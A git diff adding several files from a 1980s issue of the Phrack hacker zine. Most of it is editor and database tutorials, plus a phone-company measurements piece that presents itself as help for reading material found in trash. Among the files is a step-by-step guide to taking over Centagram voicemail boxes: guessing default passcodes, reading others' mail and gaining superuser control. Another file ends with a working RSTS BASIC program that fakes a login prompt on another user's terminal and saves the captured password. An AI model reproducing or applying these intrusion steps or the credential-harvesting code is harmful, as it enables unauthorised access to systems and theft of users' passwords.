+        Interests: Telecommunications (modeming, phreaking, hacking),
+                   telecomputing, science fiction, short wave radio, scanner
+                   listening, classic music, and shooting.
+
+The Nightstalker's Favorite Things
+----------------------------------
+
+           Women: Goes without saying; preferably ones involved in science
+                  fiction as an interest or a hobby.
+     Sci-Fi Cons: He attends many and has met many phreaks through them.
+Short wave radio: As previously mentioned, scanning.
+            Hack: A classic hack (scam), participating in or hearing of.
+         Anarchy: Confusing people with authoritative positions.
+        Shooting: Target shooting or machine guns.
+  Space programs: Obsessed since Sputnik program.
+
+Most Memorable Experiences
+--------------------------
+
+Machine gun gallery in Atlanta, Georgia.  Lots of fun!
+First time he hacked his way into a trade show.
+Boxing a call to AUTOVON and to Lebanon during U.S. occupancy and billed the
+  call to the local KKK member.
+
+Some People to Mention
+----------------------
+
+Ron Rosenbaum (wrote the Esquire article on Blue Boxes [all his fault]).
+Various science fiction authors.
+Wozniak and Jobs (for inventing the Apple).
+MIT (for inventing the Altair computer).
+Marx Brothers (for his anarchial views towards bureaucracy).
+Robert Shea and Robert Anton Wilson (wrote Illuminatus Trilogy [recommended]).
+John Draper (for showing us all how it was done).
+Original MIT Hackers (for showing us the light).
+AT&T (for providing us with this wonderful Network).
+
+------------------------------------------------------------------------------
+
+The Nightstalker is not fond of the current society that claims themselves as
+hackers or phreakers but don't learn the systems themselves.  These aren't the
+real hackers that sit down and literally hack away at a system.  Pirates
+aren't hackers.  Just because you have a computer doesn't mean you're a
+hacker.  Another thing he's displeased about is the term "hacker" used by the
+media as anyone owning a computer.  He considers the people that destroy
+systems criminals and fiends, not hackers.  Those that find the back doors and
+something unknown about a system non-malevolently or without profit in mind
+are true hackers and phreakers.
+
+About computers, The Nightstalker has strong feelings about the symbolisms of
+the brand names as status symbols in society.  He feels, rather than buying
+the computer because it's the most expensive, the neatest looking, or what
+everyone else has, you should buy it for it's capabilities which can help you
+rather than hypothetical situations many computer advertising agencies use.
+
+------------------------------------------------------------------------------
+
+I hope you enjoyed this phile, look forward to more Phrack Pro-Philes coming
+in the near future.  ...And now for the regularly taken poll from all
+interviewees.
+
+Of the general population of phreaks you have met, would you consider most
+phreaks, if any, to be computer geeks?  He feels that the term, "computer
+geek" or closer, "geek" is too relative to be able to generalize.  There have
+been people that he's met, though, that he'd not wish to exist on the same
+planet with.  Thanks for your time, Mr. Nightstalker.
+
+                                            Taran King
+                                   Sysop of Metal Shop Private
diff --git a/phrack9/3.txt b/phrack9/3.txt
new file mode 100644
index 0000000..5abdd5d
--- /dev/null
+++ b/phrack9/3.txt
@@ -0,0 +1,82 @@
+                               ==Phrack Inc.==
+
+                    Volume One, Issue Nine, Phile #3 of 10
+
+                   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+                   %                                     %
+                   %  Oryan Quest presents...            %
+                   %                                     %
+                   %  Fun With the Centagram VMS Network %
+                   %                                     %
+                   %  Written 10/13/86 for Phrack Inc.   %
+                   %                                     %
+                   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+
+
+Introduction:
+
+     Centagram VMS networks are located throughout the country. This file will
+briefly outline ways of defeating all Centagram security and how to become a
+superuser. I take full responsibility for any deaths, injuries, or venereal
+diseases resulted from use of the information in this file.
+
+
+Finding the idle VMS:
+
+     Generally, the easiest way to find an idle VMS is by scanning the last
+digits in the net (ie: XX99, XX98, XX97 etc.). The idle VMS will identify
+itself by saying, "Please leave your message at the tone" or something to that
+effect in a clear, female, synthesized voice. It will not sound unclear in any
+way. AHA! You've found your victim.
+
+
+Attacking the idle VMS:
+
+     While the "Please leave.." message is playing, hit 0. It will ID itself
+as "Mailbox XX99, please enter your passcode". If the mailbox does not say the
+above message then DON'T fuck with it. It is probably in use and any effort
+you make to hack it will be useless because it will just get taken over again.
+At this point, you must hack a 4 digit passcode. The usual defaults are as
+follows are 5000, 9876, 1234, and any # is that order. Usually, most accept
+1000, 2000, 3000, etc. I don't think 4 digits is to much to ask. W0W! Your in!
+It will then tell you how to change your passcode and generally customize your
+newly stolen VMS.
+
+
+Hopping around the net:
+
+     Suppose you have a friend that has mailbox 5286 and want to read his mail
+(if you have their passcode) or just want to listen to their announcement. You
+enter 9 on your VMS command module to logoff while it is saying "You have X
+messages remaining. Bye!" you enter the # or a 0. It will then ask you for a
+four digit extension. You enter 5286 and WHAM! you get their announcement.
+Now, wasn't that fun.
+
+
+Becoming the superuser:
+
+     So, you want to fly higher than no man has ever done before; you want to
+leap high building in a single bound; you want to be a stud. Well, listen to
+Oryan, he'll tell you how. Well, remember how you jumped across the net?? You
+follow the same procedure but, when it asks you for a four digit extension,
+you enter 9999 or 9998 or even 0000. If you were successful, it will ask you
+for a second four digit extension. You will have to hack this one on your own.
+But, I have found on at least 3 nets that it was 1986 or 1987. Gee, people are
+dumb aren't they? Once you hacked this, it will give you an expanded menu.
+WOW! You can now, read anyone's mail, take over VMS's and disconnect VMS's.
+Other commands depend on the net. But you can bet there are always a bunch of
+k-rad commands!
+
+
+Conclusion:
+
+     I hope you have enjoyed this file. Watch for updated versions in Phrack.
+If you have problems finding Centagrams, here are a few nets: 214-733-XXXX,
+415-647-XXXX, 408-790-XXXX. I can be reached at 214-733-5294. Don't play with
+my net. If I see idle mailboxes getting taken over I will just get rid of
+them. There are plenty of other networks. Special thanks to: Taran King Knight
+Lightning, SJE, The Egyptian Lover, and Ryche. Some added notes: Call the
+Attila the Hun/Master Blaster loser line at 214-733-5283.
+
+
+                    (C) Quest/Sentry Productions 10/13/86
diff --git a/phrack9/4.txt b/phrack9/4.txt
new file mode 100644
index 0000000..945d0ff
--- /dev/null
+++ b/phrack9/4.txt
@@ -0,0 +1,377 @@
+                               ==Phrack Inc.==
+
+                    Volume One, Issue Nine, Phile #4 of 10
+
+  $$$$$$$$$$$$$$$$$$$$$$$$
+  $  PROGRAMMING RSTS/E  $
+  $    File2: Editors    $
+  $ by:                  $
+  $      Solid State     $
+  $$$$$$$$$$$$$$$$$$$$$$$$
+
+  Written (c) Oct 11, 1986
+  ------------------------
+
+   Within this article I will be focusing on the TECO text editor found on
+almost every installation of RSTS that you will pass by today. I feel it is
+unneeded to do a write up on the other editors such as EDT, a screen editor
+for VT100 and VT52 terminals, and EDFOR, a FORTRAN text editor, as most
+hackers will not have the proper hardware/software at their disposal.
+   This file does not contain many tricks, but has straightforward information
+that most assuredly can be found in the user manual. Since not everyone has
+access to help documents though, this file will provide a base for the first
+time editor user and hopefully a reference for the experienced. If you feel
+otherwise.. don't waste your time reading it.
+   Following the main portion of the file is an updated copy of the decoy
+trick I promised to revise that was featured in my first file. Hopefully, (I
+am not promising though), I have succeeded in removing all the bugs this time.
+
+USES
+====
+
+   A text editor, for those of you that happen to be brain dead, is a utility
+similar to the word processor you use everyday on your micro: it allows a
+person to create, modify, and compile text files. But, also can edit, and if
+need be, create program files. For these reasons and many others, knowing how
+to use an editor thoroughly can be a major advantage to the hacker on future
+explorations.
+
+EXECUTING
+=========
+
+   Typing TECO invokes the TECO text editor. If TECO is just typed without any
+modifiers, then the file edited last will be placed in the editing buffer.
+(More on this subject can be found below under MEMORY.) To edit a different
+file, or create a new file, the following forms are used:
+
+TECO filename.ext                  To edit an existing file.
+TECO outfile.ext=infile.ext        To edit from one file to another.
+MAKE filename.ext                  To create a new file.
+
+   Other ways to execute TECO involve VT terminals, but we are not going into
+that much detail within this text.
+
+INITIALIZATION
+==============
+
+   If there is a file named TECO.INI in your directory when TECO is invoked,
+it is assumed to be the macro settings for a VT terminal. We don't need to
+bother with those, so make sure to disable the search by appending the switch
+/NOINI on execution.
+
+MEMORY
+======
+
+   Each time TECO is executed, the name of the file being edited is placed
+into another file titled TECFnn.TMP where nn is your job number. If you invoke
+TECO and wish to edit a file different than the one currently in the memory
+file, select the switch /NOMEMORY.
+
+MODIFIERS
+=========
+
+   There are a number of options, called switches, which modify the execution
+of the TECO utility. Some like /NOINI and /NOMEMORY I have previously
+mentioned. Other important switches follow along with a short description of
+each. To select one of these options, append it to the call string when you
+invoke TECO:
+
+TECO filename.ext /[option1] /[option2] ...
+
+/FIND                              This places the pointer at
+                                    the last marked position
+                                    within the input file.
+/INSPECT                           If selected, you can only
+                                    read the file, not edit.
+
+   There are a few more that deal with the VT terminals, but as I've said
+already, there is really no need to list them.
+
+INTERRUPT
+=========
+
+   The control character 'C' (CTRL/C or ^C -which it shall from now on be
+referred to as.) is used to halt the execution of the current TECO command,
+the same as it does in the BASIC monitor. If ^C is typed twice without a TECO
+command in between, the utility is aborted. (You are returned to the keyboard
+monitor whichever it was.. eg. BASIC, BASIC+2, RSX..)
+
+COMMAND EXECUTION
+=================
+
+   When TECO is called, you will receive the  *  prompt. This is the command
+prompt. Almost all commands used by the editor are one or two characters in
+length and are typed in using a normal ASCII keyboard. To terminate a TECO
+command the <ESCAPE> sequence is used. When typed, it will echo back as a  $
+character. Two consecutive <ESCAPE>s must be entered before a command will be
+carried out. This allows you to string together a line of commands like:
+
+* [command1]$[command2]$[command3]$ ... $$
+
+COMMANDS
+========
+
+ ]Moving the Pointer[
+
+   The text pointer is used to represent where you are working, ie. if you
+were to enter a command, what part of the text it would affect. It's similar
+to the job your cursor does when writing a program on your micro.
+
+'J'
+
+   The "J" command is used to move the text pointer to the beginning or end of
+the editing buffer.
+
+   BJ     Move to the beginning of the buffer.
+   ZJ     Move to end of the editing buffer.
+
+'L'
+
+   The "L" command moves the text pointer from one line to another. Common
+forms of the command are:
+
+   L      Move to beginning of the next line.
+   0L     Move to front of current line.
+   3L     Move to the third line down from the current line.
+  -1L     Move back to previous line. (One above current.)
+...
+
+'C'
+
+   The "C" command is used to move the text pointer past a specified number of
+characters, forward or backwards, on the current line. Common forms include:
+
+   C      Advance the pointer to the next character.
+   5C     Move the pointer forward five characters.
+  -5C     Move back five characters.
+...
+
+ ]Listing Text[
+
+   There is one command with a couple various forms to list the text within
+the editor; they follow.
+
+'T'
+
+   The "T" is used to list text from the editing buffer. Commonly found forms
+are:
+
+   HT     Print the entire contents of the editing buffer.
+   T      Type text from the pointer to the end of the current line.
+   0T     Type text from the beginning of the line to the text pointer.
+   5T     Print the next five lines of text from the buffer, starting where
+           the pointer is located.
+...
+
+ ]Entering Text[
+
+   What use is an editor if you can't add to the text? There is one command,
+insert, which allows you to write. If you are creating a file from scratch,
+you would enter the insert command each time you wanted to add a new line to
+your document.
+
+'I'
+
+   The "I" command is used to insert text into the buffer. After issued, the
+text entered will be placed where the text pointer is located. The command is
+of the form:
+
+   I <text> <ESCAPE>
+
+For example, to insert the sentence, "This is an example.", type:
+
+   IThis is an example$
+
+(Note: Remember that <ESCAPE> echoes back to your screen as $)
+
+ ]Deleting Text[
+
+   The TECO text editor makes it easy to delete words, sentences, etc. from
+the buffer. There are two different commands used, line delete, and letter
+delete.
+
+'K'
+
+   The "K" issued when you choose to delete lines of text from the editing
+buffer. Common forms are as follows:
+
+   K      Delete the text from the pointer through the end of the current
+           line.
+   0K     Delete the text from the beginning of the line to through the
+           pointer.
+   5K     Omit the following five lines from the buffer.
+   HK     Kill the entire contents of the buffer.
+...
+
+'D'
+
+   The "D" appropriately is used to delete individual characters. A few of the
+forms found are:
+
+   D      Delete the character which follows directly after the text pointer.
+   5D     Delete the following five characters from the text, starting from
+           the pointer.
+  -1D     Delete the character directly behind the pointer.
+...
+
+ ]Searching[
+
+   All good word processors include a routine to search and replace a string
+of text. So does the TECO text editor. Two forms are used, the locate text,
+and the search and replace text commands.
+
+'S'
+
+   The "S" is used to locate a specified string of text currently in the
+editing buffer. If the text is found, the pointer is positioned directly after
+the specified text. If the string is not found, an error message results and
+the text pointer is placed at the beginning of the buffer.
+
+   S <text> <ESCAPE>
+
+For example, to locate "This is an example.", enter:
+
+   SThis is an example.$
+
+'FS'
+
+   "FS" for find and replace does exactly that. It searches for a specified
+string of text, and if found replaces it with another sting of text. If the
+specified text is not found though, the pointer is positioned at the beginning
+of the buffer just like the "S" command. The "FS" command is of the form:
+
+   FS <old text> <ESCAPE> <new text> <ESCAPE>
+
+For an example, to replace "hullo" with "hello!", use the command:
+
+   FShullo$hello!$
+
+ ]Saving[
+
+   To save the new version of the file which you have been editing, you enter
+the exit command and it shall be saved in your directory. Remember though, if
+you wish to quit but not replace a file with your edited version, just type ^C
+twice.
+
+'EX'
+
+   The "EX" command is used to write the current buffer to the output file,
+then exit from TECO. For example:
+
+   EX$$
+
+(Note: Remember that <ESCAPE> is echoed as $, and typing <ESCAPE> twice causes
+a command to be executed.)
+
+FLAGS
+=====
+
+   The TECO text editor is not limited to the commands already shown. The
+editor has a few flags which can be entered at the  *  prompt that will modify
+the TECO environment.
+   To examine the value of a flag type:
+
+   [flag]x
+
+Where [flag] is the specified flag and x is a numeric argument which returns
+text. To set the value of a flag enter:
+
+   x[flag]
+
+Where x is the number or command being specified for the flag [flag].
+
+'EH'
+
+   EH is the error handling flag. Here's the table of arguments and their
+meanings:
+
+Value     Meaning
+
+    1     If an error is encountered within the operation of TECO, only the
+           3-character error code is printed.
+    2     If an error is encountered during operation, a short message
+           explaining the error is printed. (default setting)
+    3     If an error is encountered, the command(s) which led to the error
+           are printed.
+
+'ET'
+
+   ET, or Edit Terminal, is the command for modifying terminal output. Table
+of arguments follows:
+
+Value     Meaning
+
+    1     Output is in image mode.
+    2     Terminal in use is a scope.
+    4     Terminal in use has lowercase available.
+    8     ^T is read without echo.
+   16     Cancels ^O during output.
+  128     TECO aborts if an error is encountered.
+  256     Output to screen is truncated to the terminal's width.
+  512     VT terminal support available.
+ 1024     (same as above)
+32768     Traps ^C
+
+'^X'
+
+   ^X, the last flag I'll mention, deals with searches. (Look above for the
+command to search.)
+
+Value     Meaning
+
+    0     Either case matches during searches.
+    1     An exact case match is required to complete a search.
+
+
+CONCLUSION
+==========
+
+   That just about wraps up the TECO text editor.. boring eh? But as I've said
+time and again, editors are important to hackers.
+
+ Till next time...
+
+   Solid State
+>>>PhoneLine Phantoms!
+
+_______________________________________________________________
+File1- Addendum:
+
+   Here's the updated version of the decoy program (yeah, the one that had an
+error!) that was featured in File1. The concept of this revision is slightly
+different, but it 'should' work more efficiently and easily than the first.
+   To execute the program, first do a SYstat and record the KB numbers of
+potential targets. Run the program, and enter the number of the KB only..
+(Don't hang up!) ..then just wait till the program has ended and then check
+the output file.
+
+Note: This listing will not without modification work on all systems or under
+      all conditions.
+
+
+1 ! R S T S decoy
+10 EXTEND
+100 ON ERROR GOTO 1000
+120 PRINT CHR$(140):PRINT:PRINT
+130 INPUT "To which keyboard (KB)";K$
+140 K$=CVT$$(K$,4%)
+200 OPEN "KB:"+K$ AS FILE #1%
+220 INPUT LINE #1%,A$
+230 IF CVT$$(A$,4%)="" THEN 220
+240 PRINT #1%
+240 PRINT #1%,"RSTS"
+250 PRINT #1%
+260 PRINT #1%,"User: ";
+270 INPUT LINE #1%,U$:U$=CVT$$(U$,4%)
+280 T$=SYS(CHR$(3%))
+290 PRINT #1%,"Password: ";
+300 INPUT LINE #1%,P$:P$=CVT$$(P$,4%)
+310 Z$=SYS(CHR$(2%))
+320 PRINT #1%
+330 PRINT #1%,"Invalid entry - try again":PRINT #1%
+340 CLOSE #1%
+400 OPEN "DATA.TXT" FOR OUTPUT AS FILE #2%
+410 PRINT #2%,U$;";";P$
+420 CLOSE #2%
+999 END
+1000 PRINT "?ERROR line #";ERL:STOP
diff --git a/phrack9/5.txt b/phrack9/5.txt
new file mode 100644
index 0000000..e2ad2c8
--- /dev/null
+++ b/phrack9/5.txt
@@ -0,0 +1,329 @@
+                         ==Phrack Inc.==
+
+              Volume One, Issue Nine, Phile #5 of 10
+
+       <*************************************************>
+       <*                                               *>
+       <*                Inside Dialog                  *>
+       <*                     By                        *>
+       <*                   Ctrl C                      *>
+       <*       Advanced Telecommunications Inc.        *>
+       <*                                               *>
+       <*************************************************>
+
+
+
+     DIALOG  is  one  of the  largest  online  databases.  DIALOG
+currently  provides  access  to over 250 databases  containing  a
+total  of over  100  Million  records.  The  range of information
+available is enormous.
+
+
+BEGIN:
+     The  BEGIN  command starts a search and tells  Dialog  which
+database you want it to check out.  The BEGIN command is followed
+(without  a  space) by the file number of the database you  want.
+Either  of  the following ways could get you into  the  file  229
+(Drug information):
+
+     Begin229
+     or
+     B229
+
+     Dialog will then put the date,  the time,  your user number,
+and what it costs for  the  database you just left.  For example,
+if you move from ERIC (file 1)  to Management  Contents (file 75)
+it would look like this:
+
+-------------------------------------------------------
+
+? b75
+                    28sep86 13:59:25 User08331
+         $0.10      0.00 Hrs File1
+         $0.02      Uninet
+         $0.12      Estimated Total Cost
+File75:Management Contents - 74-86/Sep
+(Corp. Management Contents Inc.)
+          Set  Items     Description
+          ___  _____     ___________
+
+-------------------------------------------------------
+
+EXPAND:
+     The  EXPAND  command is used to pick keywords for a  search.
+You  can search for any word;  but knowing how common a  word  is
+gives you a good idea where to start your search.
+
+     All databases have a index of searchable words.  You can see
+if there are any words of the same spelling to a keyword you want
+to search for. For example:
+
+-------------------------------------------------------
+
+? Expand Drink
+Ref  Items     Index-term
+E1       1     Drina
+E2       1     Drinfeld
+E3      31    *Drink
+E4       2     Drinkers
+ .       .        .
+ .       .        .
+ .       .        .
+E12      3     Dripping
+
+-------------------------------------------------------
+
+     The  word  -more- at  the bottom of the  screen  means  that
+typing Page or P will display another screen of information.
+
+SELECT:
+     When  you find the word you want to search for,  you use the
+SELECT  command  to  tell the database what to  search  for.  The
+SELECT command can be followed with one or more search terms.
+
+SELECT STEP:
+     The  SELECT STEP command works just like the SELECT command,
+except the files it finds are listed separately.
+
+-------------------------------------------------------
+
+? SS television? OR tv
+          1    21347     TELEVISION
+          2    6376      TV
+          3    22690     1 or 2
+? SS s3 AND violen? AND child?
+          4    1680      VIOLEN?
+          5    20577     CHILD?
+          6    38        3 AND 4 AND 5
+
+-------------------------------------------------------
+
+TYPE and DISPLAY:
+     There are two commands, TYPE and DISPLAY, that you  can  use
+to look over the information you have found.   The  difference is
+the TYPE command causes a non-stop list of  the information.  The
+DISPLAY lets the information to list a page at a time,  you  have
+to type PAGE or P to see the next page.
+
+     DIALOG offers nine formats to display retrieved files.
+
+     Format    Parts of Record Listed
+     ~~~~~~    ~~~~~ ~~ ~~~~~~ ~~~~~~
+     1         Accession Number
+     2         Complete record except abstract
+     3         Bibliographic citation
+     4         File dependent
+     5         Complete record
+     6         Accession number and title
+     7         Bibliographic citation and abstract
+     8         Accession number, title, and indexing
+     9         File dependent
+
+
+
+LOGOFF:
+     The   LOGOFF   command  has  no  abbreviation.   It's   self
+explanatory.
+
+
+     DIALOG is has help commands,  typing ?HELP, or ?EXPLAIN will
+give you help.
+
+-------------------------------------------------------
+
+? ?EXPLAIN
+
+Valid EXPLAIN commands are:
+
+Basic Commands:
+
+?BEGIN    ?ENDSDI   ?MAPRN    ?SCREEN
+
+?COMBINE  ?EXPAND   ?ORDER    ?SELECT
+
+?COST     ?KEEP     ?PAGE     ?SFILES
+
+?DISPLAY  ?LIMIT    ?PRINT    ?SORT
+
+?DS       ?LIST     ?REVIEW   ?TYPE
+
+?ENDSAVE  ?LOGOFF
+
+                  ***
+
+News/Status:
+
+?DIALINDX ?FILESUM  ?ONTAP    ?SUBSCRIP
+
+?DISCOUNT ?HELP     ?RATES    ?SUPPLRS
+
+?EXPLAIN  ?INSTRUCT ?SCEDULE  ?TOLLFREE
+
+?FILES    ?MESSAGE  ?SDI      ?TRUNCATE
+
+?FILESAZ  ?NEWS     ?SEMIARS  ?UPDATE
+
+                  ***
+
+Telecommunication Access:
+
+?ACCESS   ?DIALNET  ?SABD     ?TRANSPAC
+
+?DARDO    ?FINNPAK  ?TELENET  ?TWX
+
+?DATAPAC  ?IDAS     ?TELEPAKD ?TYMNET
+
+?DATEX    ?NORPAC   ?TELEPAKS ?UNINET
+
+          ?PSS      ?TELEX    ?WATS
+
+                  ***
+
+File Information:
+
+?FIELDn*  ?FILEn*   ?LIMITn*  ?RATESn*
+
+*Enter desired file# in place of the n
+
+                  ***
+
+Training (DIALOG Service):
+
+?TRAIN (For information on DIALOG
+
+        training sessions, including
+
+        descriptions of particular
+
+        training sessions.)
+
+                  ***
+
+Training (Database Suppliers):
+
+?ANZNEWS  (Australia/New Zealand)
+
+?CANNEWS  (Canada)
+
+?EURNEWS  (Europe)
+
+?KINONEWS (Kinokuniya Japan)
+
+?MMCNEWS  (Masis Japan)
+
+?USNEWS   (United States)
+
+                  ***
+
+Online User Group News:
+
+?CANOUG   ?OUGNEWS  MMCOUG    ?USOUG
+
+?EUROUG
+
+-------------------------------------------------------
+
+Logging on
+
+For:           Type:
+Telenet        C 41520
+               C 41548
+               C 213170
+               C 213236
+Tymnet         DIALOG
+UNINET         DIALOG
+Dialnet        DIALOG
+
+To dial directly:
+
+Baud:          Number:
+300            415/858-2575
+300            415/858-2461
+1200(Bell 202) 415/858-2421
+1200(Bell 212A)415/858-0511
+1200(Bell 212A)415/858-2460
+1200(VADIC)    415/858-2391
+
+WATS:
+
+ 1-800/847-1620
+ 1-800/792-6680
+
+When it connects type P.
+
+When  you  connect  it  will  say  ENTER  YOUR  DIALOG  PASSWORD.
+Passwords  are  usually eight letters long.   When you  type  the
+correct password you will see something like this:
+
+
+-------------------------------------------------------
+
+ENTER YOUR DIALOG PASSWORD
+XXXXXXXX  LOGON File1 Sun 28sep86 18:35:12 Port866
+
+** FILES 13,104 & 139 ARE UNAVAILABLE  **
+** FILE 262 SROTS ARE NOT WORKING   **
+** FILES 7 AND 50 ARE NOT WORKING   **
+
+And a bunch more shit..
+
+-------------------------------------------------------
+
+     When  the announcements are done,  you are given a  question
+mark  (?).  The  first  command  you will want is to  move  to  a
+database.  This is done by typing B(no space) and a the  database
+number.
+
+-------------------------------------------------------
+
+? B296
+               28sep86 18:37:22 User08331
+     $0.00     0.006 Hrs File1*
+     $0.05     Telenet
+     $0.05     Estimated Total Cost
+
+File296:ONTAP TRADEMARKSCAN - O.G.
+(END/SAVE, END/SDI, .EXECUTE, .RECALL, & .RELEASE invalid for file)
+          Set  Items     Description
+          ---  -----     -----------
+
+-------------------------------------------------------
+
+I  don't have a list of all the databases,  you'll  just have  to
+play around with it.
+
+     Here's a few I know of:
+
+File Database
+---- --------
+75   Management Contents
+201  ERIC
+204  CA Search
+205  BIOSIS Privews
+208  Compendex
+213  INSPEC
+215  ABI/INFORM
+216  PTS Prompt
+229  Drug Information
+231  CHEMNAME
+247  Magazine Index
+250  CAB Abstracts
+254  Medline
+290  Dialindex
+296  TrademarkScan
+
+
+
+Summary of command Abbreviations
+
+B=BEGIN  E=EXPAND  S=SELECT SS=SELECT STEP
+T=TYPE   D=DISPLAY PR=PRINT P=PAGE
+
+Dialog Training office  1-800-227-8282 or 1-800-982-5838
+
+
+Have Fun..
+
+                    <----Ctrl C---->
+                           ATI!
+=========================================================================
diff --git a/phrack9/6.txt b/phrack9/6.txt
new file mode 100644
index 0000000..7518f47
--- /dev/null
+++ b/phrack9/6.txt
@@ -0,0 +1,308 @@
+                               ==Phrack Inc.==
+
+                    Volume One, Issue Nine, Phile #6 of 10
+
+[<+>]->->->->->->->->->->PLP<-<-<-<-<-<-<-<-<-<-[<+>]
+ |-|                     ---                     |-|
+ |P| S         [+] The Executioner [+]         L |P|
+ |h| t       [+]-PhoneLine Phantoms!-[+]       i |h|
+ |a| a       |-|-===================-|-|       n |a|
+ |n| l       |S|-|    -Present-    |-|S|       k |n|
+ |t| a       |e|-===================-|e|       o |t|
+ |o| g       |x|-|Plant Measurement|-|x|       L |o|
+ |m|         |y|-===================-|y|       a |m|
+ |s| 1       |-|-| Thanks to AT&T. |-|-|       n |s|
+ |-| 3       [+]-===================-[+]       d |-|
+ |P|                                             |P|
+ |L|  [+] Carrier Culprit    [+] Egyptian Lover  |L|
+ |P|  [+] The Executioner    [+] Solid State     |P|
+ |-|  [+] Black Majik        [+] Mr. Icom        |-|
+ |$|  -----------------------------------------  |$|
+[<+>]->->->->->->->->->->PLP<-<-<-<-<-<-<-<-<-<-[<+>]
+
+Preface
+=======
+
+     This first part in a series of three deals with how your CO measures its
+efficiency and hardware performance. I don't know how far I will go in this
+first segment so whatever I don't finish will be completed in parts two and
+three.
+
+Introduction
+============
+
+     Have you ever gone trashing and the only thing you found was a large
+printout that looked like it was written in Chinese? Did you curse yourself
+because you spent 30 minutes digging through someone's lunch and digestive
+rejectables and the only thing that was readable was a large spool that
+contained such acronyms as TRUNK and CAMA and LATA linked by foreign letters
+that you never thought could be conjugated? Well, in this 3 part series, I
+hope to show you that that large printout with coffee stains isn't all
+useless.
+
+Types of Measurements
+=====================
+
+     Now, the way your CO determines how well it is serving you is by the
+Plant Measurement. The purpose of these measurements is to provide maintenance
+personnel with a quantitative summary of the condition of the hardware and its
+impact on customer service.
+ This data is printed out at the system terminal and is used to alert
+personnel about problems before they occur.
+
+     Plant Measurement data is printed on the maintenance terminal via the
+following output messages:
+
+     1. PM01 - The PM01 is a daily printout which is printed daily at 2:30 am.
+
+     2. PM02 - The PM02 is a monthly summary printed immediately after the
+               daily PM01 printout only on the 23rd of each month.
+
+     3. PM05 - The PM03 is a daily printout which is printed after the PM01 or
+               PM02 (on the 23rd). The PM05 is utilized in offices equipped
+               with the AUTOPLEX System 100 (Advanced Mobile Telephone
+               Service).
+
+     4. PM03 - This is a daily or monthly printout which is available upon
+               manual request.
+
+------------------------------------------------------------
+
+The counts provided by the plant measurement are basically 3 types:
+
+     1. Customer Service Measurements
+     2. Hardware Performance Measurements
+     3. Base Measurements
+
+
+     Customer service measurements are a measure of the service received by
+the customer as influenced by the condition of the system's hardware. These
+include the number of calls to billings that are offered to the system but are
+delayed or lost because of marginal or faulty equipment.
+
+     Hardware Measurements are an indication of the condition of the system
+hardware which is described in terms of the number of errors, trouble
+indications, and out of service intervals. These measurements may not reflect
+customers directly, but do indicate how well the system is functioning.
+
+     Base Measurements that are provided are counts of the total calls carried
+by the system broken into various categories. These counts are necessary to
+normalize service counts and performance counts of mechanical units if
+comparisons are to be made of offices with dissimilar traffic characteristics.
+
+
+Daily PM01 Output Message
+=========================
+
+     The daily Plant Measurement data in the PM01 output message is organized
+as follows:
+
+     o Base Measurements
+     o Selected Customer Service Measurements
+     o Maintenance Measurements including emergency action
+       (EA), maintenance interrupts, and network failures
+     o Performance measurements of system hardware including
+       the central processor and bus system
+     o Coded enable peripheral units, peripheral units, and
+       trunk and service circuits.
+     o Time-Out totals
+     o Attached processor measurements
+     o Circuit Switch Digital Capability measurements
+     o Improved Public Telephone Service measurements
+     o Remote Switch System measurements
+
+===================
+=Base Measurements=
+===================
+
+     The base measurements provided by the PPMP1A00 are needed to normalize
+the service counts and performance counts of units whose uses vary with the
+traffic load. By using these counts, meaningful comparisons can be made with
+past performance and with the performance of offices with dissimilar traffic
+characteristics. The counts are taken in terms of carried load (excluding all
+traffic overflow).
+
+The BASE MEASUREMENTS are as follows, with the printout in parenthesis:
+
+1. Originate Calls (ORIG CALLS): Counts the number customer receiver seizures
+   for which at least 1 digit is received. The count includes partial dials
+   (but not permanent signals) as well as additional partied added to a
+   conference circuit. The PPMP1A00 obtains this from the traffic measurements
+   program.
+
+2. Incoming Calls (INC CALLS): Counts the number of calls originating from
+   trunks incoming from distant locations that seize an incoming register (and
+   in the case of a by-link, receive one digit). The PPMP1A00 obtains this
+   count directly from the traffic measurements program.
+
+3. Outgoing Calls (OUTG CALLS): Counts the number of calls for which
+   outpulsing is required and a transmitter is successfully seized.
+
+4. Coin Control Seizures (COIN CONTR SEIZ): Counts the number of times the
+   coin control circuit is successfully connected to a coin line. This count
+   will exceed coin line originations as the coin control circuit may be
+   seized more than once during a call.
+
+5. CAMA Seizures (CAMA SEIZ): Counts then number of times an incoming CAMA
+   trunk (operator or ANI) is seized.
+
+6. AMA Entries (AMA ENTRIES): Counts the number of billing entries put on AMA
+   tape.
+
+7. Automatic ID. Outward Dialing Seizures (AIOD SEIZ): Counts the number of
+   successful connections to an AIOD receiver.
+
+8. Centrex Data Link Seizures (CTX DL SEIZ): Counts the number of connections
+   to a centrex DL for transmission or reception of lamp and key orders. This
+   is NOT a count of centrex calls.
+
+9. Output Message Register (OMR SEIZ): Counts the number of seizure output
+   message registers.
+
+======================
+=Service Measurements=
+======================
+
+     The service measurements give valid indications of the level of customer
+service. A count of the calls lost by the system, as a result of hardware
+malfunctions, is a significant measure of the influence of the condition of
+the central office hardware on customer service. The following service
+measurements are provided.
+
+1. Hardware Lost Calls (HWR LOST CALLS): Counts the number of calls dropped
+   when a trunk is suspected and is placed on the trunk maintenance list (TML)
+   for diagnosis or when a network failure has occurred on the call.
+
+2. Hardware Lost Billing (HWR LOST BILLING): Counts the number of calls not
+   billed because both AMAs are out of service (local, long distance, and
+   special service calls are allowed to proceed without billing).
+
+3. Coin Control Failures (COIN CONTR FAILURES): Counts the number of stuck
+   coin conditions and coin telephones served by the office which had coin
+   relays that were out of limits.
+
+4. Automatic Identification Outward Dialing Special Billing Number Billing
+   (AIOD SBN BILLING): Counts the number of times the AIOD equipment fails to
+   bill a local PBX number correctly.
+
+5. Dial Tone Speed Test (DTST): Counts the number of times the customer has to
+   wait an excessive amount of time for the system to process the call because
+   trunks in the desired trunk group are busy or the system is overloaded,
+   causing queuing for equipment.  The count includes 3-second and 11-second
+   delays.
+
+     NOTE:
+          Maintenance personnel may find it necessary
+          to suspend the running of the DTST because in
+          certain trouble conditions DTST may generate
+          traffic that would interfere with maintenance
+          activities. Extended or frequent use of this
+          feature is not recommended. To discourage the
+          unnecessary use of this function, the PM01 output
+          message will include a one-line message alerting
+          maintenance personnel to it's use.
+
+6. CAMA Lost Billing (CAMA LOST BILLING): Counts the number of times a CAMA
+   call is handled but due to hardware failure, no AMA register is available
+   which is necessary for billing.
+
